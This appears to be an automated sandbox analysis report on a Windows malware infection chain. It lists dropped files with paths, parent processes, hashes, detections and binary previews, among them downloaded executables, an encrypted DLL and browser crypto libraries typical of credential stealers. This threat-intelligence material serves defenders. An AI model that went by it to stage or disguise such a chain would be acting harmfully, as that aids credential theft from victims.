SSDEEP:	6:kKNr8/VtssTwD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:9lImsLNkPlE99SNxAhUe/3
MD5:	9AF3CA9B0135C6E2D8E33CEB660A4972
SHA1:	7F36953F2228763914795387122C89F797417AEA
SHA-256:	EC7696FD37A2695245329B5A957DEFC7E22BC94DE6EFCA981BF85DEC3901E3F9
SHA-512:	E676E6A4277FE9084095F18F77F4FA6F5C9C165DB691B5AE8FBF5183246A63620A1D910B8ACAA245016969A00F79E36AA5C1A1A43680A757501C409E8D908F40
Malicious:	false
Preview:	p...... ..........F%.k..(................................................f3r.P.. ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1124f3753f.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fuckingdllENCR[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
File Type:	data
Category:	dropped
Size (bytes):	97296
Entropy (8bit):	7.9982317718947025
Encrypted:	true
SSDEEP:	1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
MD5:	E6743949BBF24B39B25399CD7C5D3A2E
SHA1:	DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
SHA-256:	A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
SHA-512:	3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
Malicious:	false
Preview:	XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~\|..j...b..K!..N.7R.}T.2bsq..1...L^..!.\|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO\|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\key[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.880179922675737
Encrypted:	false
SSDEEP:	3:gFsR0GOWW:gyRhI
MD5:	408E94319D97609B8E768415873D5A14
SHA1:	E1F56DE347505607893A0A1442B6F3659BEF79C4
SHA-256:	E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
SHA-512:	994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
Malicious:	false
Preview:	9tKiK3bsYm4fMuK47Pk3s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1858048
Entropy (8bit):	7.949064758284723
Encrypted:	false
SSDEEP:	49152:OYuhgLpL1zsZuPR2Pwm15kRS96y+czXpOW9:OYwgVLxsZuPRxmTkRSH+cz5n9
MD5:	52868AF74EE73E05662D437482D99489
SHA1:	EE9CF98060CEEBF880C722A87745601CA856FD30
SHA-256:	FD853A7428EFB478E0FED242B3A4DC8FBB704E52A91DFABB4297BB2C4CC19D22
SHA-512:	80BDE64516F6307288A6109E31E0AD499CFB6FA331B6E9F7A0F59E390AB4867497BCBD425D113C341ED6C16B687F38F68214590D516CF1984381E1A2D0670A29
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug..............................I...........@...........................J.....90....@.................................\@..p....0.......................A...................................................................................... . . .......B..................@....rsrc........0.......R..............@....idata .....@.......V..............@... ..*..P.......X..............@...beewzkou....../......Z..............@...avotpigk......I......4..............@....taggant.0....I.."...8..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2841600
Entropy (8bit):	6.513435736744595
Encrypted:	false
SSDEEP:	49152:sLkxnhzL0c+oOGeSLbVHo8Vnx0k8zrxiJRtHhdK+:sLYnhX0DoOSnVHBVxtarx2RtT
MD5:	AEC32FF205AECDA2D3D39769D699E065
SHA1:	D998DE3B99B0B9ED18C0CAEB32C90D04760E7B50
SHA-256:	A8380F919786723AED283E0A8EB39DD045EDF44F198037253D8FCAC17A03147D
SHA-512:	C90F8BA870EB40D2EB29E0E6FBBED7475503EDFDA03B8D8A4FE29D3F39297398C90A9161481DD72DC0932ADDEC4BFD97EFA0E68716F9DE050AF406939DF7071F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................,.....1.+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...smeyiuht..+.......*..:..............@...kkcdotxm. ....+......4+.............@....taggant.@....+.."...:+.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\add[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\dll[1]

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\n4e23hz[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1765888
Entropy (8bit):	7.937376255539818
Encrypted:	false
SSDEEP:	49152:IkXhu5J6iLKcMu/FQHujIytryx1GLMfzhh9JHTJ6qyrBbL:I0i9/COjIhkMfzhhMf
MD5:	40F8C17C136D4DC83B130C9467CF6DCC
SHA1:	E9B6049AA7DA0AF9718F2F4AE91653D9BAC403BB
SHA-256:	CAFB60920939BD2079D96F2E6E73F87632BC15BD72998F864E8968F7AAB9623B
SHA-512:	6760A0752957535EC45CE3307E31569AC263EB73157D6A424D6E30647651A4E93DB7C0378028D9E0CE07E65A357D2BB81047064CCDA2F6A13FA7402EE7794C2D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............................E.. ...@....@.. ....................... F.....%.....@.................................U`..i....@.......................a...................................................................................... . . ... ....... ..............@....rsrc........@......................@....idata . ...`......................@... . *.........................@...kzyimikk. ....+.....................@...vgdirfva. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	971264
Entropy (8bit):	6.705310586431969
Encrypted:	false
SSDEEP:	24576:UqDEvCTbMWu7rQYlBQcBiT6rprG8aaUpxW:UTvC/MTQYxsWR7aa
MD5:	72C4511A4B6D2BF79B718256C8D65AC8
SHA1:	1630818D4DA9A632A16D20EDD3DEC5671D0D7ADA
SHA-256:	FAF59C395B5BCCA18A81FC36CEE7BC74FF57A557764CE956B9DD020D162E6196
SHA-512:	90EF6FC14B9A803465E73E8B9E4C9DDFF5D0748D5A3BECDCF61441E7A18A1DA9D1DC1BFA24BC7D80D74FF91A221189A2B6B570C52EF30B76BD855C0724B7075E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....yWg..........".........."......w.............@..........................0............@...@.......@.....................d...\|....@...g.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....g...@...h..................@..@.reloc...u.......v...\..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\fuckingdllENCR[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe
File Type:	data
Category:	dropped
Size (bytes):	97296
Entropy (8bit):	7.9982317718947025
Encrypted:	true
SSDEEP:	1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
MD5:	E6743949BBF24B39B25399CD7C5D3A2E
SHA1:	DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
SHA-256:	A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
SHA-512:	3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
Malicious:	false
Preview:	XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~\|..j...b..K!..N.7R.}T.2bsq..1...L^..!.\|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO\|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\key[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.880179922675737
Encrypted:	false
SSDEEP:	3:gFsR0GOWW:gyRhI
MD5:	408E94319D97609B8E768415873D5A14
SHA1:	E1F56DE347505607893A0A1442B6F3659BEF79C4
SHA-256:	E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
SHA-512:	994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
Malicious:	false
Preview:	9tKiK3bsYm4fMuK47Pk3s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1947136
Entropy (8bit):	7.933957484134036
Encrypted:	false
SSDEEP:	49152:2IXCwTtHr7srlsjLBifaY7tKWmegnmyj8MXiWr+ZsI06h9:208Nfa0K+gnh8M/r+Zsw
MD5:	3ACAA0D2F010B5962A1EE0687334660D
SHA1:	0F6C414FFAA5E9052365719EA76C81B795130FE5
SHA-256:	617514B5E721E4963F6B93F203452F7988A0F4C30DB06748B90BB202331C3E73
SHA-512:	AF6349F44B5CE73ADFEB9186CE201A706B7DCD0109690326BD768F84CB01EA71AA62066B63A33A6F438296E7309418AF215228A9E052AB03AD372C14DF2FA9BD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d..........................................@.........................................................................Z.B.n.....@.h!.......................................................................................................... . ..@......T..................@....rsrc...h!....@......d..............@....idata ......B.....................@... ..).. B.....................@...qficpnjw.....0k.....................@...unknfscp...........................@....taggant.0......."..................@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.376151581636179
Encrypted:	false
SSDEEP:	48:SfNaoQy0E0vTEQy0pfNaoQyM6QytfNaoQZQD/fNaoQ10UrU0U8QD1:6NnQ3E0vTEQ3FNnQsQqNnQZQLNnQ10U+
MD5:	3A6D0773C59D42797B448A1A879F3ABA
